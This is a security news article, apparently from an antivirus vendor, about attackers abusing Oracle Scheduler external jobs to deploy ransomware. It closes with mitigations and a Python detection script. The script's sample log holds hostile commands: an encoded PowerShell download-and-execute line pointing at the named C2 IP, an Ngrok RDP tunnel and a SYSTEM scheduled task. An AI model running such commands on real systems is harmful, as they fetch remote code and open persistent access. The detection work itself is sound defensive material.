Threat Actors Exploit Oracle Database Scheduler for Stealthy Ransomware Attacks on Corporate Networks

Threat actors are exploiting the External Jobs feature of Oracle Database Scheduler, which runs operating-system commands through the extjobo.exe agent, to execute arbitrary commands on corporate database servers, giving them stealthy access and a path to ransomware deployment. In the breach described here, the attackers logged in to an internet-exposed Oracle instance with valid SYSDBA credentials and used external jobs to launch Base64-encoded PowerShell scripts that performed system reconnaissance, ran remote commands over WSMan (PowerShell remoting), and downloaded payloads such as tfod.cmd from the C2 server 80.94.95.227. One of those payloads built a reverse shell from code fetched from GitHub; the attackers deleted the downloaded files afterwards to cover their tracks.


They then tunneled RDP (port 3389) out of the network with Ngrok, created an "Admine" account and elevated it using Process Hacker (run as PT.exe) together with token manipulation, and staged the ransomware binary "win.exe" as a scheduled task named "Windows Update BETA" running as SYSTEM. The task encrypted files, appending a new extension to each, dropped the ransom note "ElonsHelp.txt" and kept a log of its activity in mcv.dll. During cleanup the attackers erased their tools and scheduled tasks and disabled the Ngrok persistence.


Mitigations: restrict network access to Oracle listener ports, disable Scheduler External Jobs where they are not needed, enforce MFA on database and remote-access logins, alert on extjobo.exe spawning cmd.exe or PowerShell and on encoded PowerShell command lines, block unapproved tunneling tools such as Ngrok (allow-listing only sanctioned ones), and keep offline or immutable backups that ransomware cannot tamper with.
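The following detection logic is an added example, not code from the article or from NPAV. It runs over a constructed Sysmon-style (Event ID 1 process-creation) JSON-lines feed and flags the four behaviours described above: extjobo.exe spawning a shell, an encoded PowerShell command that downloads or remotes (PowerShell's -EncodedCommand wraps UTF-16LE text in Base64, so that is how it is decoded), schtasks creating a SYSTEM task, and Ngrok tunneling TCP 3389. The field names follow Sysmon; the file paths, process IDs, the task parameters and the URL path on the C2 host are assumptions made for the sample, while extjobo.exe, Ngrok, "Windows Update BETA", win.exe and 80.94.95.227 come from the article.

```python
import base64
import json
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Verbs that a decoded PowerShell command should not need on a DB server.
DOWNLOAD_OR_REMOTE = ("downloadstring", "downloadfile", "invoke-webrequest",
                      "new-pssession", "invoke-command", "wsman")


def _basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects the Base64 to wrap UTF-16LE text; anything that is
    not valid Base64/UTF-16LE is reported as None instead of raising.
    """
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                  command_line, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_log(text):
    """Parse one JSON object per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze(events):
    """Return (rule, process id, detail) tuples for suspicious events."""
    findings = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        lower = cmd.lower()
        pid = ev.get("ProcessId")

        # 1. The Scheduler's external-job agent should never spawn a shell.
        if parent == "extjobo.exe" and image in SHELLS:
            findings.append(("extjobo_spawns_shell", pid, f"{parent} -> {image}"))

        # 2. Decode -EncodedCommand and look for download / remoting verbs.
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded and any(w in decoded.lower() for w in DOWNLOAD_OR_REMOTE):
                findings.append(("encoded_powershell_download", pid, decoded))

        # 3. schtasks /create ... /ru SYSTEM (how win.exe was staged).
        if (image == "schtasks.exe" and "/create" in lower
                and re.search(r'/ru\s+"?(nt authority\\)?system\b', lower)):
            findings.append(("system_scheduled_task", pid, cmd))

        # 4. Ngrok exposing RDP.
        if "ngrok" in image and re.search(r"\btcp\b.*\b3389\b", lower):
            findings.append(("ngrok_rdp_tunnel", pid, cmd))
    return findings


# Constructed sample payload: a download from the C2 named in the article
# (the /tfod.cmd path is assumed), encoded the way PowerShell requires.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://80.94.95.227/tfod.cmd')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed sample feed (not real telemetry); paths and PIDs are made up.
SAMPLE_LOG = "\n".join([
    json.dumps({"ProcessId": 4120, "ParentImage": r"C:\oracle\bin\extjobo.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"}),
    json.dumps({"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
                "Image": r"C:\Users\Public\ngrok.exe",
                "CommandLine": "ngrok.exe tcp 3389"}),
    json.dumps({"ProcessId": 4210, "ParentImage": r"C:\Windows\System32\cmd.exe",
                "Image": r"C:\Windows\System32\schtasks.exe",
                "CommandLine": r'schtasks.exe /create /tn "Windows Update BETA" '
                               r'/tr C:\ProgramData\win.exe /sc once /st 23:30 /ru SYSTEM'}),
    json.dumps({"ProcessId": 4302, "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell.exe -NoProfile -Command Get-Date"}),  # benign
])


if __name__ == "__main__":
    for rule, pid, detail in analyze(parse_log(SAMPLE_LOG)):
        print(f"[{rule}] pid={pid}: {detail}")
```

Run against the sample feed, the first event produces two findings (the parent/child pair and the decoded download), the Ngrok and schtasks events one each, and the interactive PowerShell session none. In production the same rules would be fed from Sysmon or Windows Security 4688 events with command-line auditing enabled; the parent-process rule is the one worth tuning first, since a legitimate external job that really must run cmd.exe will show up there and should be allow-listed by job name.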
NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security